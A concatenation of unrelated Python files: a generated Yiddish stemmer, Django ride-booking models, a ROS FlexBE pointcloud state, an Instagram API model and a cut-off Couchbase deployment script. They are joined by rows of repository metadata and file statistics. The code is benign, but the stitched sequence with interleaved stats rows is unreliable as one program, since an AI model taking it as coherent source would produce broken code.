if not self.eq_s(u"\u05DF"):
raise lab13()
self.ket = self.cursor
if not self.slice_from(u"\u05E0"):
return False
raise lab4()
except lab13: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05E3"):
raise lab14()
self.ket = self.cursor
if not self.slice_from(u"\u05E4"):
return False
raise lab4()
except lab14: pass
self.cursor = v_4
self.bra = self.cursor
if not self.eq_s(u"\u05E5"):
raise lab3()
self.ket = self.cursor
if not self.slice_from(u"\u05E6"):
return False
except lab4: pass
self.cursor = v_3
raise lab2()
except lab3: pass
self.cursor = v_3
if self.cursor >= self.limit:
raise lab1()
self.cursor += 1
except lab2: pass
continue
except lab1: pass
self.cursor = v_2
break
except lab0: pass
self.cursor = v_1
v_8 = self.cursor
try:
while True:
v_9 = self.cursor
try:
try:
while True:
v_10 = self.cursor
try:
self.bra = self.cursor
if not self.in_grouping(YiddishStemmer.g_niked, 1456, 1474):
raise lab18()
self.ket = self.cursor
if not self.slice_del():
return False
self.cursor = v_10
raise lab17()
except lab18: pass
self.cursor = v_10
if self.cursor >= self.limit:
raise lab16()
self.cursor += 1
except lab17: pass
continue
except lab16: pass
self.cursor = v_9
break
except lab15: pass
self.cursor = v_8
return True
def __r_mark_regions(self):
self.I_p1 = self.limit
v_1 = self.cursor
try:
try:
v_2 = self.cursor
try:
v_3 = self.cursor
try:
v_4 = self.cursor
try:
if not self.eq_s(u"\u05D2\u05E2\u05DC\u05D8"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = v_4
if not self.eq_s(u"\u05D2\u05E2\u05D1\u05E0"):
raise lab2()
except lab3: pass
self.cursor = v_3
raise lab1()
except lab2: pass
self.cursor = v_2
self.bra = self.cursor
if not self.eq_s(u"\u05D2\u05E2"):
self.cursor = v_1
raise lab0()
self.ket = self.cursor
if not self.slice_from(u"GE"):
return False
except lab1: pass
except lab0: pass
v_5 = self.cursor
try:
if self.find_among(YiddishStemmer.a_0) == 0:
self.cursor = v_5
raise lab5()
try:
v_6 = self.cursor
try:
v_7 = self.cursor
try:
v_8 = self.cursor
try:
if not self.eq_s(u"\u05E6\u05D5\u05D2\u05E0"):
raise lab9()
raise lab8()
except lab9: pass
self.cursor = v_8
try:
if not self.eq_s(u"\u05E6\u05D5\u05E7\u05D8"):
raise lab10()
raise lab8()
except lab10: pass
self.cursor = v_8
if not self.eq_s(u"\u05E6\u05D5\u05E7\u05E0"):
raise lab7()
except lab8: pass
if self.cursor < self.limit:
raise lab7()
self.cursor = v_7
raise lab6()
except lab7: pass
self.cursor = v_6
try:
v_9 = self.cursor
if not self.eq_s(u"\u05D2\u05E2\u05D1\u05E0"):
raise lab11()
self.cursor = v_9
raise lab6()
except lab11: pass
self.cursor = v_6
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D2\u05E2"):
raise lab12()
self.ket = self.cursor
if not self.slice_from(u"GE"):
return False
raise lab6()
except lab12: pass
self.cursor = v_6
self.bra = self.cursor
if not self.eq_s(u"\u05E6\u05D5"):
self.cursor = v_5
raise lab5()
self.ket = self.cursor
if not self.slice_from(u"TSU"):
return False
except lab6: pass
except lab5: pass
v_10 = self.cursor
c = self.cursor + 3
if c > self.limit:
return False
self.cursor = c
self.I_x = self.cursor
self.cursor = v_10
v_11 = self.cursor
try:
if self.find_among(YiddishStemmer.a_1) == 0:
self.cursor = v_11
raise lab13()
except lab13: pass
v_12 = self.cursor
try:
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
self.I_p1 = self.cursor
return False
except lab14: pass
self.cursor = v_12
if not self.go_out_grouping(YiddishStemmer.g_vowel, 1488, 1522):
return False
while True:
try:
if not self.in_grouping(YiddishStemmer.g_vowel, 1488, 1522):
raise lab15()
continue
except lab15: pass
break
self.I_p1 = self.cursor
try:
if not self.I_p1 < self.I_x:
raise lab16()
self.I_p1 = self.I_x
except lab16: pass
return True
def __r_R1(self):
if not self.I_p1 <= self.cursor:
return False
return True
def __r_R1plus3(self):
if not self.I_p1 <= (self.cursor + 3):
return False
return True
def __r_standard_suffix(self):
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(YiddishStemmer.a_2)
if among_var == 0:
raise lab0()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R1():
raise lab0()
if not self.slice_del():
return False
elif among_var == 2:
if not self.__r_R1():
raise lab0()
if not self.slice_from(u"\u05D9\u05E2"):
return False
elif among_var == 3:
if not self.__r_R1():
raise lab0()
if not self.slice_del():
return False
v_2 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D2\u05D0\u05E0\u05D2"):
raise lab1()
self.bra = self.cursor
if not self.slice_from(u"\u05D2\u05F2"):
return False
raise lab0()
except lab1: pass
self.cursor = self.limit - v_2
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E0\u05D5\u05DE"):
raise lab2()
self.bra = self.cursor
if not self.slice_from(u"\u05E0\u05E2\u05DE"):
return False
raise lab0()
except lab2: pass
self.cursor = self.limit - v_3
v_4 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05DE\u05D9\u05D8"):
raise lab3()
self.bra = self.cursor
if not self.slice_from(u"\u05DE\u05F2\u05D3"):
return False
raise lab0()
except lab3: pass
self.cursor = self.limit - v_4
v_5 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D9\u05D8"):
raise lab4()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05D8"):
return False
raise lab0()
except lab4: pass
self.cursor = self.limit - v_5
v_6 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D9\u05E1"):
raise lab5()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05E1"):
return False
raise lab0()
except lab5: pass
self.cursor = self.limit - v_6
v_7 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05F0\u05D9\u05D6"):
raise lab6()
self.bra = self.cursor
if not self.slice_from(u"\u05F0\u05F2\u05D6"):
return False
raise lab0()
except lab6: pass
self.cursor = self.limit - v_7
v_8 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D8\u05E8\u05D9\u05D1"):
raise lab7()
self.bra = self.cursor
if not self.slice_from(u"\u05D8\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab7: pass
self.cursor = self.limit - v_8
v_9 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05DC\u05D9\u05D8"):
raise lab8()
self.bra = self.cursor
if not self.slice_from(u"\u05DC\u05F2\u05D8"):
return False
raise lab0()
except lab8: pass
self.cursor = self.limit - v_9
v_10 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E7\u05DC\u05D9\u05D1"):
raise lab9()
self.bra = self.cursor
if not self.slice_from(u"\u05E7\u05DC\u05F2\u05D1"):
return False
raise lab0()
except lab9: pass
self.cursor = self.limit - v_10
v_11 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E8\u05D9\u05D1"):
raise lab10()
self.bra = self.cursor
if not self.slice_from(u"\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab10: pass
self.cursor = self.limit - v_11
v_12 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E8\u05D9\u05E1"):
raise lab11()
self.bra = self.cursor
if not self.slice_from(u"\u05E8\u05F2\u05E1"):
return False
raise lab0()
except lab11: pass
self.cursor = self.limit - v_12
v_13 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05F0\u05D9\u05D2"):
raise lab12()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05F0\u05F2\u05D2"):
return False
raise lab0()
except lab12: pass
self.cursor = self.limit - v_13
v_14 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05DE\u05D9\u05E1"):
raise lab13()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05DE\u05F2\u05E1"):
return False
raise lab0()
except lab13: pass
self.cursor = self.limit - v_14
v_15 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05E0\u05D9\u05D8"):
raise lab14()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05E0\u05F2\u05D3"):
return False
raise lab0()
except lab14: pass
self.cursor = self.limit - v_15
v_16 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05E8\u05D9\u05D1"):
raise lab15()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab15: pass
self.cursor = self.limit - v_16
v_17 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D5\u05E0\u05D3"):
raise lab16()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05D9\u05E0\u05D3"):
return False
raise lab0()
except lab16: pass
self.cursor = self.limit - v_17
v_18 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05F0\u05D5\u05D8\u05E9"):
raise lab17()
self.bra = self.cursor
if not self.slice_from(u"\u05F0\u05D9\u05D8\u05E9"):
return False
raise lab0()
except lab17: pass
self.cursor = self.limit - v_18
v_19 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D6\u05D5\u05E0\u05D2"):
raise lab18()
self.bra = self.cursor
if not self.slice_from(u"\u05D6\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab18: pass
self.cursor = self.limit - v_19
v_20 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D8\u05E8\u05D5\u05E0\u05E7"):
raise lab19()
self.bra = self.cursor
if not self.slice_from(u"\u05D8\u05E8\u05D9\u05E0\u05E7"):
return False
raise lab0()
except lab19: pass
self.cursor = self.limit - v_20
v_21 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E6\u05F0\u05D5\u05E0\u05D2"):
raise lab20()
self.bra = self.cursor
if not self.slice_from(u"\u05E6\u05F0\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab20: pass
self.cursor = self.limit - v_21
v_22 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05DC\u05D5\u05E0\u05D2"):
raise lab21()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05DC\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab21: pass
self.cursor = self.limit - v_22
v_23 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05F1\u05D2"):
raise lab22()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05D2"):
return False
raise lab0()
except lab22: pass
self.cursor = self.limit - v_23
v_24 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D4\u05F1\u05D1"):
raise lab23()
self.bra = self.cursor
if not self.slice_from(u"\u05D4\u05F2\u05D1"):
return False
raise lab0()
except lab23: pass
self.cursor = self.limit - v_24
v_25 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E4\u05D0\u05E8\u05DC\u05F1\u05E8"):
raise lab24()
self.bra = self.cursor
if not self.slice_from(u"\u05E4\u05D0\u05E8\u05DC\u05D9\u05E8"):
return False
raise lab0()
except lab24: pass
self.cursor = self.limit - v_25
v_26 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05D8\u05D0\u05E0"):
raise lab25()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05D8\u05F2"):
return False
raise lab0()
except lab25: pass
self.cursor = self.limit - v_26
v_27 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05F0\u05F1\u05E8"):
raise lab26()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05F0\u05E2\u05E8"):
return False
raise lab0()
except lab26: pass
self.cursor = self.limit - v_27
elif among_var == 4:
try:
v_28 = self.limit - self.cursor
try:
if not self.__r_R1():
raise lab28()
if not self.slice_del():
return False
raise lab27()
except lab28: pass
self.cursor = self.limit - v_28
if not self.slice_from(u"\u05D8"):
return False
except lab27: pass
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05E8\u05D0\u05DB"):
raise lab0()
v_29 = self.limit - self.cursor
try:
if not self.eq_s_b(u"\u05D2\u05E2"):
self.cursor = self.limit - v_29
raise lab29()
except lab29: pass
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05E8\u05E2\u05E0\u05D2"):
return False
elif among_var == 5:
if not self.slice_from(u"\u05D2\u05F2"):
return False
elif among_var == 6:
if not self.slice_from(u"\u05E0\u05E2\u05DE"):
return False
elif among_var == 7:
if not self.slice_from(u"\u05E9\u05E8\u05F2\u05D1"):
return False
elif among_var == 8:
if not self.slice_from(u"\u05DE\u05F2\u05D3"):
return False
elif among_var == 9:
if not self.slice_from(u"\u05D1\u05F2\u05D8"):
return False
elif among_var == 10:
if not self.slice_from(u"\u05D1\u05F2\u05E1"):
return False
elif among_var == 11:
if not self.slice_from(u"\u05F0\u05F2\u05D6"):
return False
elif among_var == 12:
if not self.slice_from(u"\u05D8\u05E8\u05F2\u05D1"):
return False
elif among_var == 13:
if not self.slice_from(u"\u05DC\u05F2\u05D8"):
return False
elif among_var == 14:
if not self.slice_from(u"\u05E7\u05DC\u05F2\u05D1"):
return False
elif among_var == 15:
if not self.slice_from(u"\u05E8\u05F2\u05D1"):
return False
elif among_var == 16:
if not self.slice_from(u"\u05E8\u05F2\u05E1"):
return False
elif among_var == 17:
if not self.slice_from(u"\u05E9\u05F0\u05F2\u05D2"):
return False
elif among_var == 18:
if not self.slice_from(u"\u05E9\u05DE\u05F2\u05E1"):
return False
elif among_var == 19:
if not self.slice_from(u"\u05E9\u05E0\u05F2\u05D3"):
return False
elif among_var == 20:
if not self.slice_from(u"\u05D1\u05D9\u05E0\u05D3"):
return False
elif among_var == 21:
if not self.slice_from(u"\u05F0\u05D9\u05D8\u05E9"):
return False
elif among_var == 22:
if not self.slice_from(u"\u05D6\u05D9\u05E0\u05D2"):
return False
elif among_var == 23:
if not self.slice_from(u"\u05D8\u05E8\u05D9\u05E0\u05E7"):
return False
elif among_var == 24:
if not self.slice_from(u"\u05E6\u05F0\u05D9\u05E0\u05D2"):
return False
elif among_var == 25:
if not self.slice_from(u"\u05E9\u05DC\u05D9\u05E0\u05D2"):
return False
elif among_var == 26:
if not self.slice_from(u"\u05D1\u05F2\u05D2"):
return False
elif among_var == 27:
if not self.slice_from(u"\u05D4\u05F2\u05D1"):
return False
elif among_var == 28:
if not self.slice_from(u"\u05E4\u05D0\u05E8\u05DC\u05D9\u05E8"):
return False
elif among_var == 29:
if not self.slice_from(u"\u05E9\u05D8\u05F2"):
return False
elif among_var == 30:
if not self.slice_from(u"\u05E9\u05F0\u05E2\u05E8"):
return False
elif among_var == 31:
if not self.slice_from(u"\u05D1\u05E8\u05E2\u05E0\u05D2"):
return False
elif among_var == 32:
if not self.__r_R1():
raise lab0()
if not self.slice_from(u"\u05D4"):
return False
elif among_var == 33:
try:
v_30 = self.limit - self.cursor
try:
try:
v_31 = self.limit - self.cursor
try:
if not self.eq_s_b(u"\u05D2"):
raise lab33()
raise lab32()
except lab33: pass
self.cursor = self.limit - v_31
if not self.eq_s_b(u"\u05E9"):
raise lab31()
except lab32: pass
v_32 = self.limit - self.cursor
try:
if not self.__r_R1plus3():
self.cursor = self.limit - v_32
raise lab34()
if not self.slice_from(u"\u05D9\u05E1"):
return False
except lab34: pass
raise lab30()
except lab31: pass
self.cursor = self.limit - v_30
if not self.__r_R1():
raise lab0()
if not self.slice_del():
return False
except lab30: pass
except lab0: pass
self.cursor = self.limit - v_1
v_33 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(YiddishStemmer.a_3)
if among_var == 0:
raise lab35()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R1():
raise lab35()
if not self.slice_del():
return False
else:
if not self.__r_R1():
raise lab35()
if not self.in_grouping_b(YiddishStemmer.g_consonant, 1489, 1520):
raise lab35()
if not self.slice_del():
return False
except lab35: pass
self.cursor = self.limit - v_33
v_34 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(YiddishStemmer.a_4)
if among_var == 0:
raise lab36()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R1():
raise lab36()
if not self.slice_del():
return False
except lab36: pass
self.cursor = self.limit - v_34
v_35 = self.limit - self.cursor
try:
while True:
v_36 = self.limit - self.cursor
try:
try:
while True:
v_37 = self.limit - self.cursor
try:
self.ket = self.cursor
try:
v_38 = self.limit - self.cursor
try:
if not self.eq_s_b(u"GE"):
raise lab42()
raise lab41()
except lab42: pass
self.cursor = self.limit - v_38
if not self.eq_s_b(u"TSU"):
raise lab40()
except lab41: pass
self.bra = self.cursor
if not self.slice_del():
return False
self.cursor = self.limit - v_37
raise lab39()
except lab40: pass
self.cursor = self.limit - v_37
if self.cursor <= self.limit_backward:
raise lab38()
self.cursor -= 1
except lab39: pass
continue
except lab38: pass
self.cursor = self.limit - v_36
break
except lab37: pass
self.cursor = self.limit - v_35
return True
def _stem(self):
self.__r_prelude()
v_2 = self.cursor
self.__r_mark_regions()
self.cursor = v_2
self.limit_backward = self.cursor
self.cursor = self.limit
self.__r_standard_suffix()
self.cursor = self.limit_backward
return True
class lab0(BaseException): pass
class lab1(BaseException): pass
class lab2(BaseException): pass
class lab3(BaseException): pass
class lab4(BaseException): pass
class lab5(BaseException): pass
class lab6(BaseException): pass
class lab7(BaseException): pass
class lab8(BaseException): pass
class lab9(BaseException): pass
class lab10(BaseException): pass
class lab11(BaseException): pass
class lab12(BaseException): pass
class lab13(BaseException): pass
class lab14(BaseException): pass
class lab15(BaseException): pass
class lab16(BaseException): pass
class lab17(BaseException): pass
class lab18(BaseException): pass
class lab19(BaseException): pass
class lab20(BaseException): pass
class lab21(BaseException): pass
class lab22(BaseException): pass
class lab23(BaseException): pass
class lab24(BaseException): pass
class lab25(BaseException): pass
class lab26(BaseException): pass
class lab27(BaseException): pass
class lab28(BaseException): pass
class lab29(BaseException): pass
class lab30(BaseException): pass
class lab31(BaseException): pass
class lab32(BaseException): pass
class lab33(BaseException): pass
class lab34(BaseException): pass
class lab35(BaseException): pass
class lab36(BaseException): pass
class lab37(BaseException): pass
class lab38(BaseException): pass
class lab39(BaseException): pass
class lab40(BaseException): pass
class lab41(BaseException): pass
class lab42(BaseException): pass
| 39.061739 | 92 | 0.42016 | 4,757 | 44,921 | 3.873239 | 0.044356 | 0.129172 | 0.07327 | 0.059267 | 0.75213 | 0.648684 | 0.501872 | 0.430936 | 0.405156 | 0.36711 | 0 | 0.160337 | 0.484206 | 44,921 | 1,149 | 93 | 39.095735 | 0.634873 | 0.004163 | 0 | 0.56644 | 1 | 0 | 0.118307 | 0.077649 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00582 | false | 0.118332 | 0.00194 | 0 | 0.14646 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fe60f99134a284ccb1a31a715d856dd9c20cc4dd | 3,020 | py | Python | bookingapp/models.py | bhargava-kush/dj_uber | b6dcf55c0244e83ab09afb782d0316ee5820c93a | [
"MIT"
] | null | null | null | bookingapp/models.py | bhargava-kush/dj_uber | b6dcf55c0244e83ab09afb782d0316ee5820c93a | [
"MIT"
] | null | null | null | bookingapp/models.py | bhargava-kush/dj_uber | b6dcf55c0244e83ab09afb782d0316ee5820c93a | [
"MIT"
] | null | null | null | from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
from dj_uber.users.models import User
class Location(models.Model):
TYPES = (
('CURRENT', 'current'),
('DESTINATION', 'destination'),
)
longitude = models.CharField(max_length=10)
latitude = models.CharField(max_length=10)
location_name = models.CharField(max_length=70)
type = models.CharField(choices=TYPES, max_length=20)
def __unicode__(self):
return self.location_name
def __str__(self):
return self.location_name
class Meta:
verbose_name_plural = "Locations"
class Passenger(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='passenger')
phone_number = PhoneNumberField(null=True, blank=True)
current_location = models.ForeignKey('Location', related_name='passenger_current_location', on_delete=models.CASCADE,
null=True, blank=True)
destination_location = models.ForeignKey('Location', related_name='passenger_destination_location', on_delete=models.CASCADE,
null=True, blank=True)
is_searching = models.BooleanField(default=False)
def __unicode__(self):
return self.user.email
def __str__(self):
return self.user.email
class Meta:
verbose_name_plural = "Passengers"
class Driver(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
phone_number = PhoneNumberField(null=True, blank=True)
cab_number_plate = models.CharField(max_length=20, null=True, blank=True)
seats = models.CharField(max_length=2, null=True, blank=True)
current_location = models.ForeignKey('Location', related_name='driver_current_location', on_delete=models.CASCADE,
null=True, blank=True)
def __unicode__(self):
return self.user.email
def __str__(self):
return self.user.email
class Meta:
verbose_name_plural = "Drivers"
class Trip(models.Model):
TRIP_STATUS = (('IS_ACTIVE', 'is_active'),
('IS_CANCELED', 'is_cancelled'),
('FINISHED', 'finished'))
status = models.CharField(choices=TRIP_STATUS, max_length=20)
passenger = models.ForeignKey('Passenger', on_delete=models.CASCADE, null=True, blank=True)
driver = models.ForeignKey('Driver', on_delete=models.CASCADE, null=True, blank=True)
date = models.DateField(auto_now=True)
start_location = models.ForeignKey('Location', related_name='start_location', on_delete=models.CASCADE, null=True, blank=True)
end_location = models.ForeignKey('Location', related_name='end_location', on_delete=models.CASCADE, null=True, blank=True)
def __unicode__(self):
return self.passenger.user.email
def __str__(self):
return self.passenger.user.email
class Meta:
verbose_name_plural = "Trips"
| 35.116279 | 130 | 0.68543 | 351 | 3,020 | 5.632479 | 0.219373 | 0.044512 | 0.072332 | 0.094588 | 0.627213 | 0.553364 | 0.500759 | 0.401619 | 0.363177 | 0.316641 | 0 | 0.005433 | 0.207616 | 3,020 | 85 | 131 | 35.529412 | 0.820727 | 0 | 0 | 0.409836 | 0 | 0 | 0.099105 | 0.026185 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131148 | false | 0.131148 | 0.04918 | 0.131148 | 0.803279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 2 |
fe6255da66f619f81c26c8decaf4baef4d5d7473 | 3,402 | py | Python | armada_flexbe_states/src/armada_flexbe_states/concatenate_pointcloud_service_state.py | uml-robotics/armada_behaviors | e67f1d9bd4dc7533afbd873f874c4f33bcc348d9 | [
"BSD-3-Clause"
] | null | null | null | armada_flexbe_states/src/armada_flexbe_states/concatenate_pointcloud_service_state.py | uml-robotics/armada_behaviors | e67f1d9bd4dc7533afbd873f874c4f33bcc348d9 | [
"BSD-3-Clause"
] | null | null | null | armada_flexbe_states/src/armada_flexbe_states/concatenate_pointcloud_service_state.py | uml-robotics/armada_behaviors | e67f1d9bd4dc7533afbd873f874c4f33bcc348d9 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyServiceCaller
from sensor_msgs.msg import PointCloud2
from armada_flexbe_utilities.srv import ConcatenatePointCloud, ConcatenatePointCloudResponse, ConcatenatePointCloudRequest
class concatenatePointCloudState(EventState):
'''
Example for a state to demonstrate which functionality is available for state implementation.
This example lets the behavior wait until the given target_time has passed since the behavior has been started.
># pointcloud_list List of PointCloud2 messages
#> combined_pointcloud Concatenated PointCloud2 message
<= continue Concatenated pointclouds successfully
<= failed Something went wrong
'''
def __init__(self):
# Declare outcomes, input_keys, and output_keys by calling the super constructor with the corresponding arguments.
super(concatenatePointCloudState, self).__init__(outcomes = ['continue', 'failed'],
input_keys = ['pointcloud_list'],
output_keys = ['combined_pointcloud'])
def execute(self, userdata):
# This method is called periodically while the state is active.
# Main purpose is to check state conditions and trigger a corresponding outcome.
# If no outcome is returned, the state will stay active.
self._service_topic = '/concatenate_pointcloud'
rospy.wait_for_service(self._service_topic)
self._service = ProxyServiceCaller({self._service_topic: ConcatenatePointCloud})
try:
service_response = self._service.call(self._service_topic, userdata.pointcloud_list)
userdata.combined_pointcloud = service_response.cloud_out
return 'continue'
except:
return 'failed'
def on_enter(self, userdata):
# This method is called when the state becomes active, i.e. a transition from another state to this one is taken.
# It is primarily used to start actions which are associated with this state.
Logger.loginfo('attempting to concatenate pointcloud...' )
def on_exit(self, userdata):
# This method is called when an outcome is returned and another state gets active.
# It can be used to stop possibly running processes started by on_enter.
pass # Nothing to do in this state.
def on_start(self):
# This method is called when the behavior is started.
# If possible, it is generally better to initialize used resources in the constructor
# because if anything failed, the behavior would not even be started.
pass # Nothing to do in this state.
def on_stop(self):
# This method is called whenever the behavior stops execution, also if it is cancelled.
# Use this event to clean up things like claimed resources.
pass # Nothing to do in this state.
| 47.915493 | 130 | 0.618166 | 363 | 3,402 | 5.669421 | 0.446281 | 0.03207 | 0.029155 | 0.043732 | 0.116618 | 0.103984 | 0.075802 | 0.030126 | 0.030126 | 0 | 0 | 0.001326 | 0.335097 | 3,402 | 70 | 131 | 48.6 | 0.908488 | 0.47766 | 0 | 0.107143 | 0 | 0 | 0.073156 | 0.013569 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0.107143 | 0.178571 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fe71a530e006d9c9125764b427286bc729d04eda | 360 | py | Python | instagram_api/response/model/user_presence.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | 13 | 2019-08-07T21:24:34.000Z | 2020-12-12T12:23:50.000Z | instagram_api/response/model/user_presence.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | instagram_api/response/model/user_presence.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['UserPresence', 'UserPresenceInterface']
class UserPresenceInterface(ApiInterfaceBase):
user_id: int
last_activity_at_ms: str
is_active: bool
in_threads: [str]
class UserPresence(PropertyMapper, UserPresenceInterface):
pass
| 22.5 | 58 | 0.775 | 36 | 360 | 7.472222 | 0.722222 | 0.074349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147222 | 360 | 15 | 59 | 24 | 0.876222 | 0 | 0 | 0 | 0 | 0 | 0.091667 | 0.058333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.2 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
fe75843a1c42ef72d6d90cf8b7f616b6df595353 | 3,302 | py | Python | marketplace/couchbase-hourly-pricing.py | couchbase-partners/couchbase-google-deployment-manager | 0ef5d79410410be23c8c69184e4b3d7f668a5d6c | [
"Apache-2.0"
] | 11 | 2018-03-16T20:05:29.000Z | 2020-11-20T14:21:14.000Z | marketplace/couchbase-hourly-pricing.py | couchbase-partners/couchbase-google-deployment-manager | 0ef5d79410410be23c8c69184e4b3d7f668a5d6c | [
"Apache-2.0"
] | 36 | 2017-04-26T23:32:50.000Z | 2019-03-05T11:36:01.000Z | marketplace/couchbase-hourly-pricing.py | couchbase-partners/couchbase-google-deployment-manager | 0ef5d79410410be23c8c69184e4b3d7f668a5d6c | [
"Apache-2.0"
] | 9 | 2017-07-20T10:39:40.000Z | 2021-06-23T22:05:23.000Z | import naming
def GenerateConfig(context):
license = 'hourly-pricing'
config={}
config['resources'] = []
config['outputs'] = []
couchbaseUsername='couchbase'
couchbasePassword = GeneratePassword()
config['outputs'].append({
'name': 'couchbaseUsername',
'value': couchbaseUsername
})
config['outputs'].append({
'name': 'couchbasePassword',
'value': couchbasePassword
})
clusters = GetClusters(context)
deployment = {
'name': 'deployment',
'type': 'deployment.py',
'properties': {
'serverVersion': context.properties['serverVersion'],
'syncGatewayVersion': context.properties['syncGatewayVersion'],
'couchbaseUsername': couchbaseUsername,
'couchbasePassword': couchbasePassword,
'license': license,
'clusters': clusters
}
}
config['resources'].append(deployment)
for cluster in clusters:
clusterName = cluster['cluster']
for group in cluster['groups']:
outputName = naming.ExternalIpOutputName(clusterName, group['group'])
